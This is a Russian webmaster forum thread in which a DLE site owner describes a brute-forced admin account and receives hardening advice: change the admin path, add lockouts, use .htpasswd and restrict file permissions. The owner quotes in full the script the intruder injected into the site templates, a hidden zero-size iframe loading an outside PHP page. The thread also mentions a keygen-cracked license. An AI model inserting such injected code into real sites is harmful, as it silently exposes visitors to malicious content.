Dismiss Notice
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Дыра в dle ?

Discussion in 'Вопросы- ответы' started by Driple, Jan 21, 2017.

21.01.17 в 23:25
22.01.17 в 11:26
17
1,904
0
  1. TopicStarter Overlay
    Driple

    Staff Member VIP Кинотрафик v2

    Joined:
    Dec 23, 2015
    Messages:
    369
    Best Answers:
    0
    Ratings:
    +61 / 0 / -0
    копался случайно на своём сайте в разделе пользователей, и случайно обнаружил, что один из пользователей зарегил себе логин user и каким то образом оказался с правами администратора. Как такое может быть? и как он это сделал? получается есть какой-то баг, ведь под админом можно сделать всё что угодно .... https://yadi.sk/i/VjFrtigQ3ADZzm
    и как себя обезопасить?
    более того начал проверять ftp клиентом, какие файлы были редактированы, оказалось чел залез в fullstory.tpl и navigation.tpl и вставил следующий код
    <script>document.write('<iframe src="http://avnt.ru/swf.php" width="0" height="0" frameborder="0"></iframe>');</script>
     
  2. TopicStarter Overlay
    Driple

    Staff Member VIP Кинотрафик v2

    Joined:
    Dec 23, 2015
    Messages:
    369
    Best Answers:
    0
    Ratings:
    +61 / 0 / -0
    начал разбираться дальше, чел видимо подобрал пароль к логину admin, затем создал пользователя user, зачем-то и изменил 3 файла. https://yadi.sk/i/odGrvlAM3ADiiz
    потом начал смотреть Список действий в админпанели , логин admin я давно не пользуюсь, а по нему кто то периодически логинился.
     
  3. BROKER

    Забанен

    Joined:
    Jun 6, 2015
    Messages:
    1,560
    Best Answers:
    0
    Ratings:
    +1,131 / 0 / -0
    Я конечно извиняюсь и может я не прав но объясните мне пожалуйста ............. какого хуя вы вообще открываете регу ??? По моему уже отошли времена когда вебмастера выебывались своими базами зареганных людей друг перед другом, смысл от них? На всех сайтах закрыта рега и считаю что она по большому счету нахуй не кому не нужна, сейчас пользователи скотины ленивые пошли и им пальцем то лень пошевелить не то что регаться. Но даже если и зарегался юзер какая выгода и польза с этого?

    P.S. - я конечно не беру в расчет помешанных всяких людей на коллекционировании почтовых ящиков с дальнейшей рассылкой по ним с целью впарить какую нибудь хуйню :D
     
    • Нравится Нравится x 2
  4. TopicStarter Overlay
    Driple

    Staff Member VIP Кинотрафик v2

    Joined:
    Dec 23, 2015
    Messages:
    369
    Best Answers:
    0
    Ratings:
    +61 / 0 / -0
    @BROKER, открыл регу для постоянников, вырубил им рекламу, подумал что так будет лучше. Но они то брутили логины админа, поэтому открыта или закрыта рега уже не имеет значения
     
  5. Den

    Den
    Staff Member VIP Кинотрафик v2

    Joined:
    Oct 19, 2015
    Messages:
    2,097
    Best Answers:
    0
    Ratings:
    +1,002 / 7 / -0
    спасибо за новое слово :D
     
  6. BROKER

    Забанен

    Joined:
    Jun 6, 2015
    Messages:
    1,560
    Best Answers:
    0
    Ratings:
    +1,131 / 0 / -0
    Наверное открою тайну но для всяких таких уебанов нужно делать левую админку нерабочую и пусть ебутся брутят когда как рабочую нужно по другому пути прописывать, нерабочая мало того что хуй кого авторизует даже если и правильные данные введешь так еще и блочить будет как и рабочая админка.
     
  7. TopicStarter Overlay
    Driple

    Staff Member VIP Кинотрафик v2

    Joined:
    Dec 23, 2015
    Messages:
    369
    Best Answers:
    0
    Ratings:
    +61 / 0 / -0
    @BROKER, раскрывай дальше как её сделать, так, что бы была видимость авторизации?
     
  8. europa1988

    europa1988 Бывалый

    Joined:
    Feb 24, 2016
    Messages:
    613
    Best Answers:
    2
    Ratings:
    +113 / 11 / -0
    • Нравится Нравится x 1
  9. TopicStarter Overlay
    Driple

    Staff Member VIP Кинотрафик v2

    Joined:
    Dec 23, 2015
    Messages:
    369
    Best Answers:
    0
    Ratings:
    +61 / 0 / -0
    проверил остальные сайты, каждые 5-10 минут, идёт попытка взлома-подбора логин-пароля. это какой-то пизнец. людям нех заняться, лучше бы бабки зарабатывали (((
     
  10. ZerocooL

    Staff Member Администратор VIP Кинотрафик v2

    Joined:
    Jan 29, 2015
    Messages:
    8,805
    Best Answers:
    10
    Documents:
    31
    Ratings:
    +5,267 / 267 / -1
    там 100% добавлен код мобильной рекламы на вапклик!!!!
    чисть файлы. смотри прокрутку в право!
     
    • Нравится Нравится x 3
  11. Karburator

    Staff Member VIP Кинотрафик v2

    Joined:
    Aug 17, 2016
    Messages:
    963
    Best Answers:
    0
    Ratings:
    +298 / 7 / -0
    Двиг лизензия, или нуленый/хуеленый? :D:D
     
  12. Karburator

    Staff Member VIP Кинотрафик v2

    Joined:
    Aug 17, 2016
    Messages:
    963
    Best Answers:
    0
    Ratings:
    +298 / 7 / -0
    Пароль: 1111? 0000? или qwerty? М.б. просто когда-то, дал кому-то доступ и забыл сменить пассы?
     
  13. Avenger

    Avenger Бывалый

    Joined:
    Sep 10, 2015
    Messages:
    562
    Best Answers:
    2
    Ratings:
    +152 / 26 / -0
    Ты палишь мои пароли...
     
    • Нравится Нравится x 3
  14. Ботяра

    Забанен

    Joined:
    Oct 10, 2015
    Messages:
    0
    Best Answers:
    54
    Ratings:
    +711 / 74 / -0
    1. Меняй путь админки.
    2. Включи авторизацию только через соцсети (ВК/ФБ... есть почти у всех).
    3. Измени 20 минут блока на 2000 минут блокировки при неверно введенных 2-3 попытках:
    4. Удали всех админов кроме себя.
    5. Поставь фейк авторизации от вордпресса по адресу admin.php
     
    • Нравится Нравится x 1
  15. TopicStarter Overlay
    Driple

    Staff Member VIP Кинотрафик v2

    Joined:
    Dec 23, 2015
    Messages:
    369
    Best Answers:
    0
    Ratings:
    +61 / 0 / -0
    ночью пытались снова проникнуть, но меры принял :)
    странно что один ip с которого лезут, хостинги разные были у сайтов, переехал буквально как пару дней на общий. судя по регам, до переезда уже заходили в админку. совпадение ли ...
     
  16. damir

    Staff Member VIP Кинотрафик v2

    Joined:
    Oct 20, 2015
    Messages:
    2,151
    Best Answers:
    0
    Ratings:
    +962 / 1 / -0
    @Driple,
     
  17. TopicStarter Overlay
    Driple

    Staff Member VIP Кинотрафик v2

    Joined:
    Dec 23, 2015
    Messages:
    369
    Best Answers:
    0
    Ratings:
    +61 / 0 / -0
    @damir, лицензия с кейгеном
     
  18. aeneas

    Забанен

    Joined:
    Mar 12, 2016
    Messages:
    11,450
    Best Answers:
    10
    Ratings:
    +4,027 / 208 / -0
    @Driple, а если так ? -
    1. вход в админку закрыть .htpasswd
    2. все файлы шаблона поставить права 444
    у меня так и гемороя пока не было тьфу тьфу

    я думаю один .htpasswd спасет от всей ебаты, тока в нем пароль ставь не 123456 )
     
    • Нравится Нравится x 1
Яндекс.Метрика